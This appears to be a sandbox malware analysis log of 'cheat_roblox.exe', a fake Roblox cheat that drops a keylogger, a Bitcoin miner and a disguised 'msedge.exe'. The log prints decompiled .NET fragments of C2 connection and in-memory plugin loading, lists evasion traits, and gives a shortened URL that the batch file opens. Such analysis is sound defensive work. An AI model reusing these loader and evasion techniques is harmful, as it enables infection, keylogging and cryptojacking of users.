            Source: C:\Users\user\Desktop\cheat_roblox.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: cheat_roblox.exe ReversingLabs: Detection: 59%
            Source: C:\Users\user\Desktop\cheat_roblox.exe File read: C:\Users\user\Desktop\cheat_roblox.exe
            Source: unknown Process created: C:\Users\user\Desktop\cheat_roblox.exe "C:\Users\user\Desktop\cheat_roblox.exe"
            Source: C:\Users\user\Desktop\cheat_roblox.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\cheat_roblox.exe Process created: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,10681821834965854716,2612252034697891369,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Users\user\Desktop\cheat_roblox.exe Section loaded: version.dll, dxgidebug.dll, sfc_os.dll, sspicli.dll, rsaenh.dll, uxtheme.dll, dwmapi.dll, cryptbase.dll, riched20.dll, usp10.dll, msls31.dll, kernel.appcore.dll, windowscodecs.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, apphelp.dll
            Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll, kernel.appcore.dll, uxtheme.dll, windows.storage.dll, wldp.dll, propsys.dll, ndfapi.dll, wdi.dll, iphlpapi.dll, duser.dll, xmllite.dll, atlthunk.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, urlmon.dll, iertutil.dll, srvcli.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
            Source: Google Drive.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.8.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: C:\Windows\System32\cmd.exe Automated click: OK
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe Automated click: OK
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: cheat_roblox.exe Static PE information: Image base 0x140000000 > 0x60000000
            Source: cheat_roblox.exe Static file information: File size 2675335 > 1048576
            Source: cheat_roblox.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: cheat_roblox.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: cheat_roblox.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: cheat_roblox.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: cheat_roblox.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: cheat_roblox.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: cheat_roblox.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB1F6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.dr
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: cheat_roblox.exe
            Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe.0.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.dr
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp
            Source: cheat_roblox.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: cheat_roblox.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: cheat_roblox.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: cheat_roblox.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: cheat_roblox.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            Source: BitCoin_miner.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: BitCoin_miner.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{w3NlLrUpwn05JMopXTd8mSE7UP5bcp._9YAUzJ19chMfqFNJ6TCoEOI8QxrQHh,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.YxYN6QWQIWu5XVAci3urjI00UEnFJ7,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.CCtpPZimJrMU8onPEHRRYLPAiv05nO,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.MfOa5980QCPNnU9x3V9dVBMB71uRJj,dtVFTVK0Ux3SN1R.iCtkLrztKkZDBFY()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{N3zhZ0gcLgaQW9k[2],dtVFTVK0Ux3SN1R.By4JChD42wKAESJEe0khbaDthCWknJS4g49dw5i7eJRFccFB(Convert.FromBase64String(N3zhZ0gcLgaQW9k[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: msedge.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: msedge.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: BitCoin_miner.exe.0.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
            Source: BitCoin_miner.exe.0.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
            Source: BitCoin_miner.exe.0.dr, Messages.cs .Net Code: Memory
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs .Net Code: LT2zntgXTGjsdzj2afFrTKkcoonKiN System.AppDomain.Load(byte[])
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs .Net Code: PBtLR1iSSO49jTq System.AppDomain.Load(byte[])
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs .Net Code: PBtLR1iSSO49jTq
            Source: msedge.exe.0.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
            Source: msedge.exe.0.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
            Source: msedge.exe.0.dr, Messages.cs .Net Code: Memory
            Source: RobloxPlayerInstaller.exe.0.dr Static PE information: 0xADBEC9FB [Mon May 15 23:38:35 2062 UTC]
            Source: C:\Users\user\Desktop\cheat_roblox.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_4795703
            Source: cheat_roblox.exe Static PE information: section name: .didat
            Source: cheat_roblox.exe Static PE information: section name: _RDATA
            Source: C:\Users\user\Desktop\cheat_roblox.exe Code function: 0_2_00007FF6E7E55166 push rsi; retf 0_2_00007FF6E7E55167
            Source: C:\Users\user\Desktop\cheat_roblox.exe Code function: 0_2_00007FF6E7E55156 push rsi; retf 0_2_00007FF6E7E55157
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe Code function: 4_2_010E3175 push ecx; ret 4_2_010E3188
            Source: Keyloger.exe.0.dr High entropy of concatenated method names
            Source: C:\Users\user\Desktop\cheat_roblox.exe File created: C:\Users\user\AppData\Local\Temp\ msedge.exe
            Source: C:\Users\user\Desktop\cheat_roblox.exe File created: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe
            Source: C:\Users\user\Desktop\cheat_roblox.exe File created: C:\Users\user\AppData\Local\Temp\Keyloger.exe
            Source: C:\Users\user\Desktop\cheat_roblox.exe File created: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe File created: C:\Users\user\AppData\Local\Roblox\logs\RobloxPlayerInstaller_9F112.log
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
            Source: C:\Users\user\Desktop\cheat_roblox.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe RDTSC instruction interceptor: First address: ED39F0 second address: ED3A8B instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ecx+20h], eax 0x00000005 mov dword ptr [ecx+24h], edx 0x00000008 mov dword ptr [ecx+2Ch], 00000016h 0x0000000f mov dword ptr [ecx+30h], 00000000h 0x00000016 mov dword ptr [ecx+34h], 00000000h 0x0000001d mov dword ptr [ecx+38h], 00000000h 0x00000024 mov dword ptr [ecx+48h], 00000000h 0x0000002b mov dword ptr [ecx+4Ch], 00000000h 0x00000032 mov dword ptr [ecx+50h], 00000000h 0x00000039 mov dword ptr [ecx+54h], 00000000h 0x00000040 mov dword ptr [ecx+68h], 00000000h 0x00000047 mov dword ptr [ecx+60h], 00000000h 0x0000004e mov dword ptr [ecx+64h], 00000000h 0x00000055 mov dword ptr [ecx+6Ch], 00000001h 0x0000005c mov dword ptr [ecx+10h], 0000003Ch 0x00000063 mov dword ptr [ecx], 00000000h 0x00000069 mov dword ptr [ecx+00088978h], FFFFFFFFh 0x00000073 mov dword ptr [ecx+00088D80h], FFFFFFFFh 0x0000007d mov dword ptr [ecx+00089188h], FFFFFFFFh 0x00000087 mov dword ptr [ecx+00089590h], FFFFFFFFh 0x00000091 mov dword ptr [ecx+00089998h], FFFFFFFFh 0x0000009b rdtsc
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe Window / User API: threadDelayed 1358
            Source: C:\Users\user\Desktop\cheat_roblox.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ msedge.exe
            Source: C:\Users\user\Desktop\cheat_roblox.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Keyloger.exe
            Source: C:\Users\user\Desktop\cheat_roblox.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_4-1880
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe TID: 7908 Thread sleep time: -58693s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe TID: 7908 Thread sleep time: -49877s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe File Volume queried: C:\Users\user\AppData\Local\Temp\Roblox\http FullSizeInformation
            Source: C:\Users\user\Desktop\cheat_roblox.exe Code function: 0_2_00007FF6E7E3B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6E7E3B190
            Source: C:\Users\user\Desktop\cheat_roblox.exe Code function: 0_2_00007FF6E7E240BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6E7E240BC
            Source: C:\Users\user\Desktop\cheat_roblox.exe Code function: 0_2_00007FF6E7E4FCA0 FindFirstFileExA,0_2_00007FF6E7E4FCA0
            Source: C:\Users\user\Desktop\cheat_roblox.exe Code function: 0_2_00007FF6E7E416A4 VirtualQuery,GetSystemInfo,0_2_00007FF6E7E416A4
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe Thread delayed: delay time: 58693
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe Thread delayed: delay time: 49877
            Source: cheat_roblox.exe, 00000000.00000003.1323908977.000001A0AB31E000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1335404161.000000000259A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmp, cacert.pem.4.dr, RobloxPlayerInstaller.exe.0.dr Binary or memory string: MDALj2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmUv4RDsNuE
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.1508922887.00000000025A0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509200841.00000000025AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\cheat_roblox.exe Code function: 0_2_00007FF6E7E476D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6E7E476D8
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe Code function: 4_2_0110D0F8 mov eax, dword ptr fs:[00000030h] 4_2_0110D0F8
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe Code function: 4_2_0110D13C mov eax, dword ptr fs:[00000030h] 4_2_0110D13C
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe Code function: 4_2_011043AC mov ecx, dword ptr fs:[00000030h] 4_2_011043AC
            Source: C:\Users\user\Desktop\cheat_roblox.exe Code function: 0_2_00007FF6E7E50D20 GetProcessHeap,0_2_00007FF6E7E50D20
            Source: C:\Users\user\Desktop\cheat_roblox.exe Code function: 0_2_00007FF6E7E42510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6E7E42510
            Source: C:\Users\user\Desktop\cheat_roblox.exe Code function: 0_2_00007FF6E7E43354 SetUnhandledExceptionFilter,0_2_00007FF6E7E43354
            Source: C:\Users\user\Desktop\cheat_roblox.exe Code function: 0_2_00007FF6E7E43170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6E7E43170
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe Code function: 4_2_010E2F78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_010E2F78
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe Code function: 4_2_010EE378 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_010EE378
